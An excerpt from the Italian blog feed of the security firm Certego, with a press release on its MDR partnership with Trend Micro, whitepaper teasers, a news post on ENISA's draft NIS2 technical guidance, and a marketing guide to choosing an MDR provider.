&lt;p&gt;&lt;em&gt;“Abbiamo deciso di collaborare con Trend Micro per la comprovata affidabilità della loro soluzione XDR, tra le più avanzate sul mercato.&lt;/em&gt;” Dichiara Bernardino Grignaffini, CEO &amp;#x26; founder di Certego, che prosegue: &lt;em&gt;“Questa partnership ha reso possibile la creazione di un servizio esclusivo sul mercato. La nostra tecnologia supera il concetto tradizionale di integrazione e non si occupa di semplice monitoraggio; Certego fornisce servizi MDR (Managed Detection and Response) con un approccio proattivo, che va oltre la semplice gestione degli alert, tipica di un SOC. Analizziamo in modo approfondito tecniche, tattiche e tipologie di attacco per applicare le nostre conoscenze sui dati di Trend Micro, rendendoli così pienamente funzionali alle attività di rilevamento. Questo approccio costituisce l&apos;elemento distintivo di Certego, massimizzando il valore della tecnologia Trend Micro.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“L’alleanza pluriennale con il gruppo VEM e la collaborazione con Certego sono un vanto per offrire un servizio MDR all’avanguardia che risponde alle esigenze critiche di cybersecurity delle aziende moderne,”&lt;/em&gt; dichiara Salvatore Marcis Head of Channel and Territory Sales Trend Micro &lt;em&gt;“Grazie alla nostra tecnologia XDR e all’approccio analitico e proattivo di Certego, possiamo garantire una protezione su misura che va oltre la semplice risposta agli attacchi, offrendo una sicurezza adattiva e integrata. Questa partnership valorizza la nostra visione di una difesa collaborativa e continua, massimizzando il potenziale della nostra tecnologia nelle mani di un team di esperti.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I clienti che sceglieranno i servizi Certego della nuova tecnologia integrata nella piattaforma di Trend Micro potranno usufruire di soluzioni XDR avanzate, combinate con un servizio MDR guidato dalla threat intelligence. Un ulteriore vantaggio per i clienti è la gestione completa degli alert e dei rischi, con notifiche non solo sugli incidenti ma anche sui potenziali pericoli, grazie a un monitoraggio continuo e proattivo. Inoltre, i clienti avranno accesso in tempo reale alle dashboard presenti in &lt;strong&gt;PanOptikon®&lt;/strong&gt;, che offrono una visione completa e aggiornata dello stato di sicurezza aziendale. La piattaforma non si limita ai singoli alert ma fornisce report e dashboard dettagliati, arricchiti dai dati di Trend Micro, consentendo una visione globale e approfondita del livello di cyber risk dell&apos;azienda.&lt;/p&gt;
&lt;p&gt;La sinergia tra Trend Micro e Certego, prossima a ricevere dal vendor la qualificazione come “authorized MSSP”, è il risultato di oltre vent’anni di collaborazione tra il leader globale nella cybersecurity e il gruppo VEM Sistemi.
L’integrazione tra Certego e Trend Micro, unita alla storica collaborazione con VEM, offre ai clienti un ecosistema di alto livello che include una gestione centralizzata e completa di tutte le fasi: installazione, configurazione, prevenzione, detection e response. A seconda delle esigenze, i clienti possono contare su un pool di specialisti altamente qualificati che si occuperà delle loro necessità. L&apos;offerta è parte di V-Secure, il modello di Gestione Integrata della Sicurezza IT sviluppato da VEM sistemi, che copre tutte e quattro le fasi del Governo della Sicurezza Informatica: Anticipazione del Rischio, Prevenzione, Rilevamento e Risposta agli incidenti. V-Secure oggi è in grado di offrire un servizio di gestione degli endpoint arricchito da tutti i vantaggi della sinergia tecnologica tra Certego e Trend Micro.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Certego&lt;/h3&gt;
&lt;p&gt;Certego Srl è la società del Gruppo VEM sistemi specializzata nell’erogazione di servizi MDR (Managed Detection and Response). Fondata nel 2013 e con sede a Modena, si distingue nel panorama italiano per un modello di business innovativo e un’offerta esclusiva, basati su PanOptikon®, la piattaforma proprietaria di Unified Security Operations, e su un team di analisti senior con le principali certificazioni internazionali nel settore. Con oltre 200 clienti attivi, più di un milione di asset IT monitorati e 10.000 incidenti gestiti nel 2023, Certego adotta un modello di protezione proattivo guidato dalla threat intelligence e dall&apos;analisi delle tecniche di attacco degli avversari, per prevenire le minacce e garantire una risposta rapida ed efficace in caso di attacco. Il team di Security Operations di Certego si avvale di un gruppo eterogeneo di specialisti altamente qualificati nei vari ambiti della cybersecurity, tra cui Cybersecurity Analyst, Threat Researcher, Incident Responder ed esperti in analisi forense. &lt;a href=&quot;https://www.certego.net/&quot;&gt;&lt;strong&gt;www.certego.net&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Trend Micro&lt;/h3&gt;
&lt;p&gt;Trend Micro, leader globale di cybersecurity, è impegnata a rendere il mondo un posto più sicuro per lo scambio di informazioni digitali. Con oltre 30 anni di esperienza nella security, nel campo della ricerca sulle minacce e con una propensione all’innovazione continua, Trend Micro protegge oltre 500.000 organizzazioni e milioni di individui che utilizzano il cloud, le reti e i più diversi dispositivi, attraverso la sua piattaforma unificata di cybersecurity. La piattaforma unificata di cybersecurity Trend Vision One™ fornisce tecniche avanzate di difesa dalle minacce, XDR e si integra con i diversi ecosistemi IT, inclusi AWS, Microsoft e Google, permettendo alle organizzazioni di comprendere, comunicare e mitigare al meglio i rischi cyber. Con 7.000 dipendenti in 65 Paesi, Trend Micro permette alle organizzazioni di semplificare e mettere al sicuro il loro spazio connesso. &lt;a href=&quot;https://www.trendmicro.com/it_it/business.html&quot;&gt;&lt;strong&gt;www.trendmicro.com&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;VEM sistemi&lt;/h3&gt;
&lt;p&gt;Da 38 anni VEM sistemi è uno degli ICT player italiani più innovativi, attento a intercettare le nuove tendenze del settore, rendendole funzionali alle esigenze dei clienti. Forlivese di nascita con sedi a Milano, Modena, Padova, Roma e Senigallia, il Gruppo VEM conta oggi 400 dipendenti e tre controllate: Certego, specializzata nei servizi di Cyber Threat Intelligence e contrasto al cybercrime, Mydev, dedicata allo sviluppo di soluzioni di software integration, business intelligence e piattaforme digitali su hybrid e public cloud e NEEN, Managed Cloud Provider specializzato nella progettazione e gestione di infrastrutture distribuite e ad alta affidabilità.
Oggi VEM è riconosciuta come partner di riferimento per la trasformazione digitale di PMI e grandi aziende, con una visione olistica che va dalla cybersecurity, alla business continuity, dalla collaboration, al data center, fino all&apos;automazione dell&apos;edificio e allo sviluppo software.
Rendere semplice la fruizione di soluzioni e servizi che sottendono un&apos;elevata complessità di integrazione tecnologica è la sua qualità distintiva. &lt;a href=&quot;https://vem.com/&quot;&gt;&lt;strong&gt;www.vem.com&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Ottobre 2024]]></description><link>https://www.certego.net/blog/whitepaper-ottobre-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-ottobre-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 11 Nov 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di ottobre 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Security Operations Report - Ottobre 2024]]></title><description><![CDATA[Il report realizzato dal team di SecOps di Certego che analizza i trend di sicurezza delle aziende italiane]]></description><link>https://www.certego.net/blog/whitepaper-secops-report-ottobre-2024/</link><guid isPermaLink="false">whitepaper-secops-report-ottobre-2024</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 04 Nov 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Avere una chiara consapevolezza dei rischi a cui le aziende sono maggiormente esposte è essenziale per comprendere i trend degli attacchi informatici.&lt;/p&gt;
&lt;p&gt;Il report realizzato dal team di Security Operations di Certego, basato su un campione di 1.200.000 asset IT di aziende italiane di diverse dimensioni e settori, offre una panoramica preziosa delle minacce attuali.&lt;/p&gt;
&lt;p&gt;Grazie alla piattaforma PanOptikon®, che integra avanzate funzioni di data analytics, abbiamo potuto identificare le principali tendenze, vulnerabilità e minacce nel panorama della cybersecurity italiana aggiornate a ottobre 2024.&lt;/p&gt;
&lt;p&gt;L’approccio metodologico ha permesso di ottenere una visione dettagliata e costantemente aggiornata dei rischi informatici che le aziende italiane affrontano, offrendo uno strumento fondamentale per comprendere le criticità e migliorare la sicurezza aziendale.&lt;/p&gt;
&lt;p&gt;Il report risponde a domande cruciali, come:&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi?
Quali settori risultano maggiormente vulnerabili?
Qual è la proporzione tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Compila il modulo per ricevere il PDF completo.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[NIS2 - ENISA pubblica la bozza della guida tecnica per conformarsi alla direttiva]]></title><description><![CDATA[Un importante strumento tecnico per le aziende coinvolte]]></description><link>https://www.certego.net/blog/nis2-enisa-pubblica-la-bozza-della-guida-tecnica-per-conformarsi-alla-direttiva/</link><guid isPermaLink="false">nis2-enisa-pubblica-la-bozza-della-guida-tecnica-per-conformarsi-alla-direttiva</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 23 Oct 2024 22:00:00 GMT</pubDate><content:encoded>&lt;hr&gt;
&lt;p&gt;In data 7 novembre 2024, l’ENISA (Agenzia dell&apos;Unione Europea per la Cybersecurity) ha pubblicato la bozza della guida tecnica per supportare gli Stati membri ed enti dell&apos;Unione Europea nell&apos;attuazione dei requisiti tecnici e metodologici previsti dalle misure di gestione del rischio di cybersecurity stabilite dal Regolamento di esecuzione della Commissione (UE) 2024/2690 del 17 ottobre 2024.&lt;/p&gt;
&lt;p&gt;Questo strumento rappresenta un fondamentale punto di riferimento per le organizzazioni che si confrontano con le sfide della direttiva NIS2, in vigore in tutta Europa.&lt;/p&gt;
&lt;h2&gt;Perché la guida tecnica di ENISA è così utile?&lt;/h2&gt;
&lt;p&gt;L&apos;obiettivo della guida tecnica è fornire supporto operativo attraverso tre principali risorse:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Consigli pratici per l&apos;implementazione dei requisiti e chiarimenti sui concetti chiave&lt;/strong&gt;: la guida offre spiegazioni dettagliate su concetti e termini specifici utilizzati nel testo legislativo, con suggerimenti su come affrontare al meglio ogni requisito. Questo aiuto diretto è prezioso per le organizzazioni, facilitando la comprensione e la traduzione dei requisiti legali in misure pratiche.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Esempi di evidenze per la verifica di conformità&lt;/strong&gt;: la guida include esempi concreti di documentazione e procedure che le organizzazioni possono utilizzare per dimostrare la conformità ai requisiti della NIS2, semplificando il lavoro di verifica e migliorando l&apos;affidabilità dei controlli.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Mappatura dei requisiti di sicurezza rispetto agli standard europei e internazionali&lt;/strong&gt;: la guida include le tabelle che mettono in relazione i requisiti del Regolamento di esecuzione con vari standard internazionali (come ISO 27001) e con quadri normativi nazionali, permettendo alle organizzazioni di armonizzare le proprie pratiche di cybersecurity con altre norme già esistenti.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Contesto e consultazione pubblica&lt;/h2&gt;
&lt;p&gt;La Direttiva NIS2, entrata in vigore nell&apos;ottobre 2024, è il nuovo quadro normativo europeo per la cybersecurity, con l&apos;obiettivo di incrementare la resilienza dei settori critici dell&apos;UE. La Commissione Europea, attraverso il regolamento di esecuzione, ha specificato i requisiti di gestione del rischio di cybersecurity per vari settori, tra cui fornitori di infrastrutture digitali, provider di servizi cloud, data center, e piattaforme di social networking.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La bozza della guida tecnica dell’ENISA è attualmente disponibile per una consultazione pubblica, aperta fino al 9 dicembre 2024, e le istruzioni su come inviare il proprio feedback sono disponibili sul sito ENISA. Questo processo permette agli attori del settore di fornire un contributo diretto, rendendo la guida ancora più efficace e in linea con le reali esigenze operative&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Grazie a questa iniziativa, ENISA sta supportando attivamente l&apos;implementazione di un livello elevato di sicurezza informatica in Europa, fornendo alle organizzazioni un quadro pratico e coerente per adeguarsi alle richieste della NIS2 e contribuire a un sistema digitale europeo più sicuro e resiliente.&lt;/p&gt;
&lt;h2&gt;Scarica la guida&lt;/h2&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.enisa.europa.eu/news/asking-for-your-feedback-enisa-technical-guidance-for-the-cybersecurity-measures-of-the-nis2-implementing-act&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 634px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 66.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAEFAwT/xAAVAQEBAAAAAAAAAAAAAAAAAAABAv/aAAwDAQACEAMQAAAB7VRm3Gggf//EABoQAQADAQEBAAAAAAAAAAAAAAIAAQMEFCL/2gAIAQEAAQUC8ojyxMrmxVTp+iXZP//EABYRAQEBAAAAAAAAAAAAAAAAAAEAEv/aAAgBAwEBPwFAsl//xAAYEQEBAAMAAAAAAAAAAAAAAAABAAISYf/aAAgBAgEBPwEyVt+3/8QAHBAAAQMFAAAAAAAAAAAAAAAAAQARkRASMWGB/9oACAEBAAY/AsGUL3HU4eagaX//xAAZEAEAAwEBAAAAAAAAAAAAAAABABEhQTH/2gAIAQEAAT8h0bQ5qDWpzUOKhm25fR8YNqwcn//aAAwDAQACAAMAAAAQVA//xAAYEQACAwAAAAAAAAAAAAAAAAAAAREhMf/aAAgBAwEBPxBJSFBh/8QAFhEBAQEAAAAAAAAAAAAAAAAAAQAR/9oACAECAQE/EAAsocn/xAAbEAEAAgMBAQAAAAAAAAAAAAABABEhMcFBcf/aAAgBAQABPxALIDxclosKAnIRTrEWYnsJ8gCaBpLG1JgPktj/2Q==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/3971e9e262cd5e0ae9b3f4e710b5bdf7/f2afa/guida%20enisa%20nis2%20download%20certego.jpg&quot; srcset=&quot;/website/static/3971e9e262cd5e0ae9b3f4e710b5bdf7/4ecad/guida%20enisa%20nis2%20download%20certego.jpg 384w,
/website/static/3971e9e262cd5e0ae9b3f4e710b5bdf7/f2afa/guida%20enisa%20nis2%20download%20certego.jpg 634w&quot; sizes=&quot;(max-width: 634px) 100vw, 634px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[MDR - Come scegliere il servizio migliore per la tua azienda]]></title><description><![CDATA[Guida alla scelta consapevole del tuo partner MDR]]></description><link>https://www.certego.net/blog/mdr-come-scegliere-il-servizio-migliore-per-la-tua-azienda/</link><guid isPermaLink="false">mdr-come-scegliere-il-servizio-migliore-per-la-tua-azienda</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 23 Oct 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nel contesto attuale della sicurezza informatica, i servizi di Managed Detection and Response (MDR) offrono una soluzione di cybersecurity che combina &lt;strong&gt;tecnologie avanzate e competenze umane&lt;/strong&gt; per rilevare e rispondere rapidamente alle minacce, ampliando le capacità difensive di un&apos;organizzazione.&lt;/p&gt;
&lt;p&gt;Rispetto ai tradizionali Security Operations Center (SOC), che si concentrano principalmente sulla gestione degli alert tramite diverse tecnologie di difesa, l&apos;&lt;strong&gt;MDR adotta un approccio più proattivo&lt;/strong&gt;. Oltre al monitoraggio continuo 24/7 e alla risposta agli incidenti, l&apos;MDR integra funzionalità come l&apos;analisi comportamentale, la caccia alle minacce (Threat Hunting) e la Threat Intelligence per &lt;strong&gt;studiare e identificare in anticipo le minacce più innovative&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Questa proattività rende l&apos;MDR una soluzione particolarmente efficace per le organizzazioni che cercano una protezione costante, aggiornata e su misura.&lt;/p&gt;
&lt;p&gt;Ma come scegliere il servizio MDR più adatto alla tua azienda? In questo articolo offriamo una panoramica delle caratteristiche chiave da valutare per prendere una decisione informata.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Per ulteriori approfondimenti, puoi scaricare la nostra guida su come scegliere il miglior servizio MDR per la tua azienda, che include una serie di domande fondamentali da porre al fornitore per valutarne l&apos;affidabilità e l&apos;idoneità alla tua organizzazione.&lt;/em&gt;
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;La tecnologia alla base di un servizio MDR&lt;/h2&gt;
&lt;p&gt;Nel valutare un servizio di Managed Detection and Response (MDR), &lt;strong&gt;la tecnologia è un elemento cruciale, poiché influisce direttamente sulla qualità del servizio&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Affidarsi a un servizio MDR basato su una &lt;strong&gt;piattaforma proprietaria che unifica in un’unica console le diverse funzioni per la gestione completa della sicurezza&lt;/strong&gt;, offre un significativo vantaggio. Questo approccio riduce la frammentazione operativa, migliorando i tempi di risposta agli incidenti e l&apos;efficienza generale delle operazioni di security.&lt;/p&gt;
&lt;p&gt;Una piattaforma di Unified Security Operations consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Andare oltre la gestione degli alert, integrando funzionalità avanzate come SOAR, SIEM;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Fornire un&apos;analisi completa e aggiornata del rischio informatico a cui l’azienda è esposta;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Unificare le comunicazioni tra cliente e fornitore in una sola console, facilitando la collaborazione e migliorando la gestione della sicurezza;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Accedere ai dati telemetrici degli endpoint per potenziare le capacità di rilevamento e condurre analisi approfondite sugli eventi di sicurezza;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Personalizzare le regole di rilevamento in base alle esigenze specifiche dell&apos;azienda, con la possibilità di modificare la gravità dei ticket, sviluppare correlazioni su misura e integrare log specifici;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Ottenere report dettagliati, adattabili ai diversi stakeholder, come team IT, CIO e management.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;Servizi offerti: personalizzazione e proattività&lt;/h2&gt;
&lt;p&gt;Nella scelta di un fornitore MDR, i servizi offerti sono un fattore cruciale. È importante verificare che il servizio garantisca &lt;strong&gt;alti livelli di personalizzazione&lt;/strong&gt; e una risposta tempestiva alle minacce.&lt;/p&gt;
&lt;p&gt;Un servizio MDR di qualità deve essere supportato da un team di esperti specializzati in vari ambiti della sicurezza informatica, come Cyber Security Analysts, Threat Hunters e Incident Responders.&lt;/p&gt;
&lt;p&gt;L&apos;approccio ideale punta ad &lt;strong&gt;anticipare le minacce&lt;/strong&gt;, adattando i sistemi di difesa prima che si verifichino, superando il tradizionale modello SOC, focalizzato sulla risposta agli incidenti.&lt;/p&gt;
&lt;p&gt;Quando valuti i servizi del provider MDR, considera questi aspetti:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Presenza di esperti senior specializzati in diversi ambiti della cybersecurity;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Un servizio d&apos;élite include un Customer Service Specialist dedicato, che accompagna il cliente dall&apos;onboarding alla revisione continua dei servizi. Questa figura fornisce aggiornamenti personalizzati sullo stato della sicurezza e consigli proattivi per migliorare le difese;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Verifica che le attività di Incident Response siano incluse nel pacchetto offerto&lt;/strong&gt;. L&apos;assenza di tali attività potrebbe generare criticità significative e rendere difficile stimare con precisione i costi complessivi del servizio al momento della firma del contratto.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/whitepaper-come-scegliere-il-servizio-mdr-migliore-per-la-tua-azienda/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACcklEQVR42lWST1PTUBTFs/Rb6MKdfgp164aVS1k5gqLjwIg7u3JGVBaO49Jxo8hoAVuVWostraWhYKmlTZrSUNqXl79tCQQdouR40+mGxW9y33u575177xEM0/K7vb7f6+/7Trfnm5Z9Gts5tdYN0+8wzee64Ye5Q45p/4S+fYEClLbKEIsbqMl1MKZB3W1hp7mLxk5zwE5IU4XGDRimDZ3r0HV9EIcw3Qwsuwt60BNarTYikYe4MzGB9/PzcPtdeO4+/v75PUw04B8f41MshvRqFiuqg+g2wwIRq2pINUykGzxYV3WYpukJhmGgKKtIliTE8puYS4sQ6bBkemCOi37fhf/vBIsLUSSSKRRaDpYqe0hIGlYUjnqbQ221gw6p1zj3BOoF6lTOL0lBRVZQ2pawUa5g9H4E049nMTp6HZcuX8Gt2xMQCyIymQxiS4uIk+LP8TjSmVWsFQqBpnG0O+xI0Kgsz/NwRLiui8ODg0E8++IlxqamcPfeJM6dPY9rIyMoFotYTX1DavkL0sllRN/NQa6UoRtGEAqjoXgCo5u3tmVUpQY63AIn6TJzcPVtEReexXHxyUecGXuOkckI1tfymNk0MZXjmM7reJDneCQytJkWhL3mBvUwVJjN5ZFIJPE9k0WWGh9LZXBj/gdufihgPCpiPF7GzJslunANr6o2nq4zzIZsaHhNa5pwQLZDh1EPQ9s0VRWSLKMm1UhpDbIsQWvUwJQqWJ2QK9htKNhrM3hdC55j4tA24BEK/SvJSiDXldBuNGXTohcc2E5vSHeAOUS3Bj6DFkLV7JFPNRLBKS88+5rOkZ1ywXIigZ+lkvcfsqyuVm1x1+IAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/01a2d2c15569ede70958143f209e6dae/71c1d/cover%20whitepaper%20mdr%20migliore.png&quot; srcset=&quot;/website/static/01a2d2c15569ede70958143f209e6dae/804b2/cover%20whitepaper%20mdr%20migliore.png 384w,
/website/static/01a2d2c15569ede70958143f209e6dae/e5715/cover%20whitepaper%20mdr%20migliore.png 768w,
/website/static/01a2d2c15569ede70958143f209e6dae/71c1d/cover%20whitepaper%20mdr%20migliore.png 1536w,
/website/static/01a2d2c15569ede70958143f209e6dae/a878e/cover%20whitepaper%20mdr%20migliore.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;La Threat Intelligence: conoscere e anticipare le minacce&lt;/h2&gt;
&lt;p&gt;Nella valutazione di un servizio MDR, l&apos;integrazione con servizi di Threat Intelligence è essenziale per un approccio volto ad anticipare le minacce.&lt;/p&gt;
&lt;p&gt;Quando valuti i servizi di Threat Intelligence del provider MDR, assicurati che:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;I dati non si limitino alle informazioni dal deep e dark web basate su fonti OSINT (Open Source Intelligence). I migliori servizi MDR forniscono dati di Threat Intelligence azionabili, utili per una risposta proattiva. Questi dati, noti come &lt;strong&gt;Tactical Threat Intelligence&lt;/strong&gt;, vengono raccolti costantemente tramite sensori e honeypot proprietari, fornendo informazioni in tempo reale sulle minacce emergenti. Questo approccio non solo ottimizza il monitoraggio, ma consente di adattare dinamicamente le difese contro le tecniche di attacco più avanzate;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Il provider abbia un &lt;strong&gt;ecosistema applicativo proprietario di Threat Intelligence&lt;/strong&gt;, in grado di raccogliere, aggregare e arricchire i dati in tempo reale, automatizzando l&apos;aggiornamento delle regole di detection. L&apos;uso di IOC (Indicator of Compromise) e BIOC (Behavioral Indicator of Compromise) deve garantire un costante adattamento dei sistemi di difesa e una risposta efficace alle minacce emergenti;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Il servizio di Threat Intelligence fornisca dati specifici per il tuo settore e mercato. Ad esempio, un&apos;azienda italiana ha bisogno di indicatori di compromissione mirati alle minacce del contesto italiano;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Il team di Threat Intelligence partecipi attivamente a network e ricerche di settore. La collaborazione in programmi di condivisione di IOC e le partnership con leader globali dimostra l&apos;affidabilità e rilevanza delle informazioni del provider.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;Certificazioni e competenze: un sigillo di garanzia&lt;/h2&gt;
&lt;p&gt;Un ultimo aspetto cruciale nella scelta di un servizio MDR è la verifica delle certificazioni e delle competenze del provider e dei team che lo compongono. Certificazioni nel campo della sicurezza informatica, come CISSP, GIAC o quelle rilasciate da enti europei come ENISA, rappresentano un chiaro indicatore di un alto livello di competenza e conformità agli standard internazionali.&lt;/p&gt;
&lt;p&gt;Inoltre, la partecipazione a network internazionali di sicurezza e progetti di ricerca avanzati è un ulteriore segnale di affidabilità, dimostrando che il provider è sempre aggiornato sulle ultime tendenze e sulle minacce emergenti.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;p&gt;Scegliere il miglior servizio MDR per la tua azienda richiede un&apos;analisi approfondita e la valutazione di diversi fattori: dalla tecnologia impiegata, ai servizi offerti, fino alle certificazioni del provider.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Per approfondire ogni aspetto trattato in questo articolo e supportarti nel processo decisionale abbiamo realizzato una guida dettagliata intitolata &quot;Come scegliere il servizio MDR migliore per la tua azienda.&quot; La guida esamina in profondità le caratteristiche essenziali che un provider MDR dovrebbe possedere per soddisfare le necessità della tua organizzazione. Inoltre, include la lista di domande chiave da porre al fornitore, pensata per aiutarti a valutare in modo critico e approfondito le diverse opzioni disponibili, garantendo così una scelta pienamente consapevole e allineata alle tue esigenze&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/whitepaper-come-scegliere-il-servizio-mdr-migliore-per-la-tua-azienda/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
